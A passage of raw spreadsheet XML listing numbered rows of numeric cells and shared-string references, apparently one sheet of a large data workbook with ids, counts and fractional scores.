      <c r="B16075" s="2">
        <v>5.3899429E7</v>
      </c>
      <c r="C16075" s="2" t="s">
        <v>15519</v>
      </c>
      <c r="D16075" s="2">
        <v>1.0</v>
      </c>
      <c r="E16075" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16075" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16076" ht="15.75" customHeight="1">
      <c r="A16076" s="1">
        <v>18823.0</v>
      </c>
      <c r="B16076" s="2">
        <v>5.3927896E7</v>
      </c>
      <c r="C16076" s="2" t="s">
        <v>15423</v>
      </c>
      <c r="D16076" s="2">
        <v>1.0</v>
      </c>
      <c r="E16076" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16076" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16077" ht="15.75" customHeight="1">
      <c r="A16077" s="1">
        <v>19046.0</v>
      </c>
      <c r="B16077" s="2">
        <v>5.456949E7</v>
      </c>
      <c r="C16077" s="2" t="s">
        <v>15520</v>
      </c>
      <c r="D16077" s="2">
        <v>1.0</v>
      </c>
      <c r="E16077" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16077" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16078" ht="15.75" customHeight="1">
      <c r="A16078" s="1">
        <v>19100.0</v>
      </c>
      <c r="B16078" s="2">
        <v>5.4701602E7</v>
      </c>
      <c r="C16078" s="2" t="s">
        <v>15521</v>
      </c>
      <c r="D16078" s="2">
        <v>1.0</v>
      </c>
      <c r="E16078" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16078" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16079" ht="15.75" customHeight="1">
      <c r="A16079" s="1">
        <v>19179.0</v>
      </c>
      <c r="B16079" s="2">
        <v>5.4972328E7</v>
      </c>
      <c r="C16079" s="2" t="s">
        <v>15522</v>
      </c>
      <c r="D16079" s="2">
        <v>1.0</v>
      </c>
      <c r="E16079" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16079" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16080" ht="15.75" customHeight="1">
      <c r="A16080" s="1">
        <v>19305.0</v>
      </c>
      <c r="B16080" s="2">
        <v>5.5226943E7</v>
      </c>
      <c r="C16080" s="2" t="s">
        <v>15479</v>
      </c>
      <c r="D16080" s="2">
        <v>1.0</v>
      </c>
      <c r="E16080" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16080" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16081" ht="15.75" customHeight="1">
      <c r="A16081" s="1">
        <v>19481.0</v>
      </c>
      <c r="B16081" s="2">
        <v>5.5854104E7</v>
      </c>
      <c r="C16081" s="2" t="s">
        <v>15523</v>
      </c>
      <c r="D16081" s="2">
        <v>1.0</v>
      </c>
      <c r="E16081" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16081" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16082" ht="15.75" customHeight="1">
      <c r="A16082" s="1">
        <v>19927.0</v>
      </c>
      <c r="B16082" s="2">
        <v>5.7433722E7</v>
      </c>
      <c r="C16082" s="2" t="s">
        <v>15524</v>
      </c>
      <c r="D16082" s="2">
        <v>1.0</v>
      </c>
      <c r="E16082" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16082" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16083" ht="15.75" customHeight="1">
      <c r="A16083" s="1">
        <v>20101.0</v>
      </c>
      <c r="B16083" s="2">
        <v>9764340.0</v>
      </c>
      <c r="C16083" s="2" t="s">
        <v>15525</v>
      </c>
      <c r="D16083" s="2">
        <v>1.0</v>
      </c>
      <c r="E16083" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16083" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16084" ht="15.75" customHeight="1">
      <c r="A16084" s="1">
        <v>20259.0</v>
      </c>
      <c r="B16084" s="2">
        <v>1.1050335E7</v>
      </c>
      <c r="C16084" s="2" t="s">
        <v>15526</v>
      </c>
      <c r="D16084" s="2">
        <v>1.0</v>
      </c>
      <c r="E16084" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16084" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16085" ht="15.75" customHeight="1">
      <c r="A16085" s="1">
        <v>20523.0</v>
      </c>
      <c r="B16085" s="2">
        <v>1.3129174E7</v>
      </c>
      <c r="C16085" s="2" t="s">
        <v>15527</v>
      </c>
      <c r="D16085" s="2">
        <v>1.0</v>
      </c>
      <c r="E16085" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16085" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16086" ht="15.75" customHeight="1">
      <c r="A16086" s="1">
        <v>21515.0</v>
      </c>
      <c r="B16086" s="2">
        <v>2.3185678E7</v>
      </c>
      <c r="C16086" s="2" t="s">
        <v>15528</v>
      </c>
      <c r="D16086" s="2">
        <v>1.0</v>
      </c>
      <c r="E16086" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16086" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16087" ht="15.75" customHeight="1">
      <c r="A16087" s="1">
        <v>21938.0</v>
      </c>
      <c r="B16087" s="2">
        <v>2.8670789E7</v>
      </c>
      <c r="C16087" s="2" t="s">
        <v>15529</v>
      </c>
      <c r="D16087" s="2">
        <v>1.0</v>
      </c>
      <c r="E16087" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16087" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16088" ht="15.75" customHeight="1">
      <c r="A16088" s="1">
        <v>22133.0</v>
      </c>
      <c r="B16088" s="2">
        <v>3.1097856E7</v>
      </c>
      <c r="C16088" s="2" t="s">
        <v>15530</v>
      </c>
      <c r="D16088" s="2">
        <v>1.0</v>
      </c>
      <c r="E16088" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16088" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16089" ht="15.75" customHeight="1">
      <c r="A16089" s="1">
        <v>22182.0</v>
      </c>
      <c r="B16089" s="2">
        <v>3.1720745E7</v>
      </c>
      <c r="C16089" s="2" t="s">
        <v>15531</v>
      </c>
      <c r="D16089" s="2">
        <v>1.0</v>
      </c>
      <c r="E16089" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16089" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16090" ht="15.75" customHeight="1">
      <c r="A16090" s="1">
        <v>22624.0</v>
      </c>
      <c r="B16090" s="2">
        <v>4.0177853E7</v>
      </c>
      <c r="C16090" s="2" t="s">
        <v>15532</v>
      </c>
      <c r="D16090" s="2">
        <v>1.0</v>
      </c>
      <c r="E16090" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16090" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16091" ht="15.75" customHeight="1">
      <c r="A16091" s="1">
        <v>22969.0</v>
      </c>
      <c r="B16091" s="2">
        <v>4.9228525E7</v>
      </c>
      <c r="C16091" s="2" t="s">
        <v>15533</v>
      </c>
      <c r="D16091" s="2">
        <v>1.0</v>
      </c>
      <c r="E16091" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16091" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16092" ht="15.75" customHeight="1">
      <c r="A16092" s="1">
        <v>23265.0</v>
      </c>
      <c r="B16092" s="2">
        <v>5328818.0</v>
      </c>
      <c r="C16092" s="2" t="s">
        <v>15534</v>
      </c>
      <c r="D16092" s="2">
        <v>1.0</v>
      </c>
      <c r="E16092" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16092" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16093" ht="15.75" customHeight="1">
      <c r="A16093" s="1">
        <v>23477.0</v>
      </c>
      <c r="B16093" s="2">
        <v>5728787.0</v>
      </c>
      <c r="C16093" s="2" t="s">
        <v>15535</v>
      </c>
      <c r="D16093" s="2">
        <v>1.0</v>
      </c>
      <c r="E16093" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16093" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16094" ht="15.75" customHeight="1">
      <c r="A16094" s="1">
        <v>23601.0</v>
      </c>
      <c r="B16094" s="2">
        <v>6395524.0</v>
      </c>
      <c r="C16094" s="2" t="s">
        <v>15536</v>
      </c>
      <c r="D16094" s="2">
        <v>1.0</v>
      </c>
      <c r="E16094" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16094" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16095" ht="15.75" customHeight="1">
      <c r="A16095" s="1">
        <v>25159.0</v>
      </c>
      <c r="B16095" s="2">
        <v>1.3065718E7</v>
      </c>
      <c r="C16095" s="2" t="s">
        <v>15537</v>
      </c>
      <c r="D16095" s="2">
        <v>1.0</v>
      </c>
      <c r="E16095" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16095" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16096" ht="15.75" customHeight="1">
      <c r="A16096" s="1">
        <v>25233.0</v>
      </c>
      <c r="B16096" s="2">
        <v>1.3359535E7</v>
      </c>
      <c r="C16096" s="2" t="s">
        <v>15538</v>
      </c>
      <c r="D16096" s="2">
        <v>1.0</v>
      </c>
      <c r="E16096" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16096" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16097" ht="15.75" customHeight="1">
      <c r="A16097" s="1">
        <v>25646.0</v>
      </c>
      <c r="B16097" s="2">
        <v>1.4518686E7</v>
      </c>
      <c r="C16097" s="2" t="s">
        <v>15539</v>
      </c>
      <c r="D16097" s="2">
        <v>1.0</v>
      </c>
      <c r="E16097" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16097" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16098" ht="15.75" customHeight="1">
      <c r="A16098" s="1">
        <v>25737.0</v>
      </c>
      <c r="B16098" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C16098" s="2" t="s">
        <v>15540</v>
      </c>
      <c r="D16098" s="2">
        <v>1.0</v>
      </c>
      <c r="E16098" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16098" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16099" ht="15.75" customHeight="1">
      <c r="A16099" s="1">
        <v>25816.0</v>
      </c>
      <c r="B16099" s="2">
        <v>1.4768341E7</v>
      </c>
      <c r="C16099" s="2" t="s">
        <v>15541</v>
      </c>
      <c r="D16099" s="2">
        <v>1.0</v>
      </c>
      <c r="E16099" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16099" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16100" ht="15.75" customHeight="1">
      <c r="A16100" s="1">
        <v>26503.0</v>
      </c>
      <c r="B16100" s="2">
        <v>1.7556238E7</v>
      </c>
      <c r="C16100" s="2" t="s">
        <v>15542</v>
      </c>
      <c r="D16100" s="2">
        <v>1.0</v>
      </c>
      <c r="E16100" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16100" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16101" ht="15.75" customHeight="1">
      <c r="A16101" s="1">
        <v>26659.0</v>
      </c>
      <c r="B16101" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C16101" s="2" t="s">
        <v>15543</v>
      </c>
      <c r="D16101" s="2">
        <v>1.0</v>
      </c>
      <c r="E16101" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16101" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16102" ht="15.75" customHeight="1">
      <c r="A16102" s="1">
        <v>26858.0</v>
      </c>
      <c r="B16102" s="2">
        <v>1.9029553E7</v>
      </c>
      <c r="C16102" s="2" t="s">
        <v>15544</v>
      </c>
      <c r="D16102" s="2">
        <v>1.0</v>
      </c>
      <c r="E16102" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16102" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16103" ht="15.75" customHeight="1">
      <c r="A16103" s="1">
        <v>27260.0</v>
      </c>
      <c r="B16103" s="2">
        <v>2.1161357E7</v>
      </c>
      <c r="C16103" s="2" t="s">
        <v>15545</v>
      </c>
      <c r="D16103" s="2">
        <v>1.0</v>
      </c>
      <c r="E16103" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16103" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16104" ht="15.75" customHeight="1">
      <c r="A16104" s="1">
        <v>27508.0</v>
      </c>
      <c r="B16104" s="2">
        <v>2.2116599E7</v>
      </c>
      <c r="C16104" s="2" t="s">
        <v>15546</v>
      </c>
      <c r="D16104" s="2">
        <v>1.0</v>
      </c>
      <c r="E16104" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16104" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16105" ht="15.75" customHeight="1">
      <c r="A16105" s="1">
        <v>27667.0</v>
      </c>
      <c r="B16105" s="2">
        <v>2.2924248E7</v>
      </c>
      <c r="C16105" s="2" t="s">
        <v>15547</v>
      </c>
      <c r="D16105" s="2">
        <v>1.0</v>
      </c>
      <c r="E16105" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16105" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16106" ht="15.75" customHeight="1">
      <c r="A16106" s="1">
        <v>28115.0</v>
      </c>
      <c r="B16106" s="2">
        <v>2.4665696E7</v>
      </c>
      <c r="C16106" s="2" t="s">
        <v>15548</v>
      </c>
      <c r="D16106" s="2">
        <v>1.0</v>
      </c>
      <c r="E16106" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16106" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16107" ht="15.75" customHeight="1">
      <c r="A16107" s="1">
        <v>28456.0</v>
      </c>
      <c r="B16107" s="2">
        <v>2.6604342E7</v>
      </c>
      <c r="C16107" s="2" t="s">
        <v>15549</v>
      </c>
      <c r="D16107" s="2">
        <v>1.0</v>
      </c>
      <c r="E16107" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16107" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16108" ht="15.75" customHeight="1">
      <c r="A16108" s="1">
        <v>28687.0</v>
      </c>
      <c r="B16108" s="2">
        <v>2.7616712E7</v>
      </c>
      <c r="C16108" s="2" t="s">
        <v>15550</v>
      </c>
      <c r="D16108" s="2">
        <v>1.0</v>
      </c>
      <c r="E16108" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16108" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16109" ht="15.75" customHeight="1">
      <c r="A16109" s="1">
        <v>28811.0</v>
      </c>
      <c r="B16109" s="2">
        <v>2.8670788E7</v>
      </c>
      <c r="C16109" s="2" t="s">
        <v>15551</v>
      </c>
      <c r="D16109" s="2">
        <v>1.0</v>
      </c>
      <c r="E16109" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16109" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16110" ht="15.75" customHeight="1">
      <c r="A16110" s="1">
        <v>29270.0</v>
      </c>
      <c r="B16110" s="2">
        <v>3.0991304E7</v>
      </c>
      <c r="C16110" s="2" t="s">
        <v>15552</v>
      </c>
      <c r="D16110" s="2">
        <v>1.0</v>
      </c>
      <c r="E16110" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16110" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16111" ht="15.75" customHeight="1">
      <c r="A16111" s="1">
        <v>29695.0</v>
      </c>
      <c r="B16111" s="2">
        <v>3.4271374E7</v>
      </c>
      <c r="C16111" s="2" t="s">
        <v>15553</v>
      </c>
      <c r="D16111" s="2">
        <v>1.0</v>
      </c>
      <c r="E16111" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16111" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16112" ht="15.75" customHeight="1">
      <c r="A16112" s="1">
        <v>30071.0</v>
      </c>
      <c r="B16112" s="2">
        <v>3625220.0</v>
      </c>
      <c r="C16112" s="2" t="s">
        <v>15554</v>
      </c>
      <c r="D16112" s="2">
        <v>1.0</v>
      </c>
      <c r="E16112" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16112" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16113" ht="15.75" customHeight="1">
      <c r="A16113" s="1">
        <v>30079.0</v>
      </c>
      <c r="B16113" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C16113" s="2" t="s">
        <v>15555</v>
      </c>
      <c r="D16113" s="2">
        <v>1.0</v>
      </c>
      <c r="E16113" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16113" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16114" ht="15.75" customHeight="1">
      <c r="A16114" s="1">
        <v>30184.0</v>
      </c>
      <c r="B16114" s="2">
        <v>3.7189812E7</v>
      </c>
      <c r="C16114" s="2" t="s">
        <v>15556</v>
      </c>
      <c r="D16114" s="2">
        <v>1.0</v>
      </c>
      <c r="E16114" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16114" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16115" ht="15.75" customHeight="1">
      <c r="A16115" s="1">
        <v>30598.0</v>
      </c>
      <c r="B16115" s="2">
        <v>4.1336106E7</v>
      </c>
      <c r="C16115" s="2" t="s">
        <v>15557</v>
      </c>
      <c r="D16115" s="2">
        <v>1.0</v>
      </c>
      <c r="E16115" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16115" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16116" ht="15.75" customHeight="1">
      <c r="A16116" s="1">
        <v>30621.0</v>
      </c>
      <c r="B16116" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C16116" s="2" t="s">
        <v>15558</v>
      </c>
      <c r="D16116" s="2">
        <v>1.0</v>
      </c>
      <c r="E16116" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16116" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16117" ht="15.75" customHeight="1">
      <c r="A16117" s="1">
        <v>30696.0</v>
      </c>
      <c r="B16117" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C16117" s="2" t="s">
        <v>15559</v>
      </c>
      <c r="D16117" s="2">
        <v>1.0</v>
      </c>
      <c r="E16117" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16117" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16118" ht="15.75" customHeight="1">
      <c r="A16118" s="1">
        <v>30989.0</v>
      </c>
      <c r="B16118" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C16118" s="2" t="s">
        <v>15560</v>
      </c>
      <c r="D16118" s="2">
        <v>1.0</v>
      </c>
      <c r="E16118" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16118" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16119" ht="15.75" customHeight="1">
      <c r="A16119" s="1">
        <v>31009.0</v>
      </c>
      <c r="B16119" s="2">
        <v>4771280.0</v>
      </c>
      <c r="C16119" s="2" t="s">
        <v>15561</v>
      </c>
      <c r="D16119" s="2">
        <v>1.0</v>
      </c>
      <c r="E16119" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16119" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16120" ht="15.75" customHeight="1">
      <c r="A16120" s="1">
        <v>31207.0</v>
      </c>
      <c r="B16120" s="2">
        <v>4.9228524E7</v>
      </c>
      <c r="C16120" s="2" t="s">
        <v>15533</v>
      </c>
      <c r="D16120" s="2">
        <v>1.0</v>
      </c>
      <c r="E16120" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16120" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16121" ht="15.75" customHeight="1">
      <c r="A16121" s="1">
        <v>31703.0</v>
      </c>
      <c r="B16121" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C16121" s="2" t="s">
        <v>15562</v>
      </c>
      <c r="D16121" s="2">
        <v>1.0</v>
      </c>
      <c r="E16121" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16121" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16122" ht="15.75" customHeight="1">
      <c r="A16122" s="1">
        <v>31925.0</v>
      </c>
      <c r="B16122" s="2">
        <v>5.3046946E7</v>
      </c>
      <c r="C16122" s="2" t="s">
        <v>15563</v>
      </c>
      <c r="D16122" s="2">
        <v>1.0</v>
      </c>
      <c r="E16122" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16122" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16123" ht="15.75" customHeight="1">
      <c r="A16123" s="1">
        <v>32045.0</v>
      </c>
      <c r="B16123" s="2">
        <v>5369993.0</v>
      </c>
      <c r="C16123" s="2" t="s">
        <v>15564</v>
      </c>
      <c r="D16123" s="2">
        <v>1.0</v>
      </c>
      <c r="E16123" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16123" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16124" ht="15.75" customHeight="1">
      <c r="A16124" s="1">
        <v>32707.0</v>
      </c>
      <c r="B16124" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C16124" s="2" t="s">
        <v>15565</v>
      </c>
      <c r="D16124" s="2">
        <v>1.0</v>
      </c>
      <c r="E16124" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16124" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16125" ht="15.75" customHeight="1">
      <c r="A16125" s="1">
        <v>33150.0</v>
      </c>
      <c r="B16125" s="2">
        <v>7069878.0</v>
      </c>
      <c r="C16125" s="2" t="s">
        <v>15566</v>
      </c>
      <c r="D16125" s="2">
        <v>1.0</v>
      </c>
      <c r="E16125" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16125" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16126" ht="15.75" customHeight="1">
      <c r="A16126" s="1">
        <v>33341.0</v>
      </c>
      <c r="B16126" s="2">
        <v>7599881.0</v>
      </c>
      <c r="C16126" s="2" t="s">
        <v>15567</v>
      </c>
      <c r="D16126" s="2">
        <v>1.0</v>
      </c>
      <c r="E16126" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16126" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16127" ht="15.75" customHeight="1">
      <c r="A16127" s="1">
        <v>33344.0</v>
      </c>
      <c r="B16127" s="2">
        <v>7599918.0</v>
      </c>
      <c r="C16127" s="2" t="s">
        <v>15567</v>
      </c>
      <c r="D16127" s="2">
        <v>1.0</v>
      </c>
      <c r="E16127" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16127" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16128" ht="15.75" customHeight="1">
      <c r="A16128" s="1">
        <v>33648.0</v>
      </c>
      <c r="B16128" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C16128" s="2" t="s">
        <v>15568</v>
      </c>
      <c r="D16128" s="2">
        <v>1.0</v>
      </c>
      <c r="E16128" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16128" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16129" ht="15.75" customHeight="1">
      <c r="A16129" s="1">
        <v>33944.0</v>
      </c>
      <c r="B16129" s="2">
        <v>9290233.0</v>
      </c>
      <c r="C16129" s="2" t="s">
        <v>15569</v>
      </c>
      <c r="D16129" s="2">
        <v>1.0</v>
      </c>
      <c r="E16129" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16129" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16130" ht="15.75" customHeight="1">
      <c r="A16130" s="1">
        <v>33982.0</v>
      </c>
      <c r="B16130" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C16130" s="2" t="s">
        <v>15570</v>
      </c>
      <c r="D16130" s="2">
        <v>1.0</v>
      </c>
      <c r="E16130" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16130" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16131" ht="15.75" customHeight="1">
      <c r="A16131" s="1">
        <v>34130.0</v>
      </c>
      <c r="B16131" s="2">
        <v>9779015.0</v>
      </c>
      <c r="C16131" s="2" t="s">
        <v>15540</v>
      </c>
      <c r="D16131" s="2">
        <v>1.0</v>
      </c>
      <c r="E16131" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16131" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16132" ht="15.75" customHeight="1">
      <c r="A16132" s="1">
        <v>15237.0</v>
      </c>
      <c r="B16132" s="2">
        <v>4.2259032E7</v>
      </c>
      <c r="C16132" s="2" t="s">
        <v>15571</v>
      </c>
      <c r="D16132" s="2">
        <v>1.0</v>
      </c>
      <c r="E16132" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16132" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="16133" ht="15.75" customHeight="1">
      <c r="A16133" s="1">
        <v>4905.0</v>
      </c>
      <c r="B16133" s="2">
        <v>4.3921211E7</v>
      </c>
      <c r="C16133" s="2" t="s">
        <v>15572</v>
      </c>
      <c r="D16133" s="2">
        <v>1.0</v>
      </c>
      <c r="E16133" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16133" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="16134" ht="15.75" customHeight="1">
      <c r="A16134" s="1">
        <v>9084.0</v>
      </c>
      <c r="B16134" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C16134" s="2" t="s">
        <v>15573</v>
      </c>
      <c r="D16134" s="2">
        <v>1.0</v>
      </c>
      <c r="E16134" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16134" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="16135" ht="15.75" customHeight="1">
      <c r="A16135" s="1">
        <v>17350.0</v>
      </c>
      <c r="B16135" s="2">
        <v>4.9424886E7</v>
      </c>
      <c r="C16135" s="2" t="s">
        <v>15574</v>
      </c>
      <c r="D16135" s="2">
        <v>1.0</v>
      </c>
      <c r="E16135" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16135" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="16136" ht="15.75" customHeight="1">
      <c r="A16136" s="1">
        <v>479.0</v>
      </c>
      <c r="B16136" s="2">
        <v>1.7447767E7</v>
      </c>
      <c r="C16136" s="2" t="s">
        <v>15575</v>
      </c>
      <c r="D16136" s="2">
        <v>1.0</v>
      </c>
      <c r="E16136" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16136" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="16137" ht="15.75" customHeight="1">
      <c r="A16137" s="1">
        <v>7591.0</v>
      </c>
      <c r="B16137" s="2">
        <v>5.1606283E7</v>
      </c>
      <c r="C16137" s="2" t="s">
        <v>15576</v>
      </c>
      <c r="D16137" s="2">
        <v>1.0</v>
      </c>
      <c r="E16137" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16137" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="16138" ht="15.75" customHeight="1">
      <c r="A16138" s="1">
        <v>9363.0</v>
      </c>
      <c r="B16138" s="2">
        <v>5.5680819E7</v>
      </c>
      <c r="C16138" s="2" t="s">
        <v>15577</v>
      </c>
      <c r="D16138" s="2">
        <v>1.0</v>
      </c>
      <c r="E16138" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16138" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="16139" ht="15.75" customHeight="1">
      <c r="A16139" s="1">
        <v>11317.0</v>
      </c>
      <c r="B16139" s="2">
        <v>2.1073942E7</v>
      </c>
      <c r="C16139" s="2" t="s">
        <v>15578</v>
      </c>
      <c r="D16139" s="2">
        <v>1.0</v>
      </c>
      <c r="E16139" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16139" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="16140" ht="15.75" customHeight="1">
      <c r="A16140" s="1">
        <v>6496.0</v>
      </c>
      <c r="B16140" s="2">
        <v>4.8706693E7</v>
      </c>
      <c r="C16140" s="2" t="s">
        <v>15579</v>
      </c>
      <c r="D16140" s="2">
        <v>1.0</v>
      </c>
      <c r="E16140" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16140" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="16141" ht="15.75" customHeight="1">
      <c r="A16141" s="1">
        <v>12974.0</v>
      </c>
      <c r="B16141" s="2">
        <v>3.2623982E7</v>
      </c>
      <c r="C16141" s="2" t="s">
        <v>15580</v>
      </c>
      <c r="D16141" s="2">
        <v>1.0</v>
      </c>
      <c r="E16141" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16141" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="16142" ht="15.75" customHeight="1">
      <c r="A16142" s="1">
        <v>13135.0</v>
      </c>
      <c r="B16142" s="2">
        <v>3.370817E7</v>
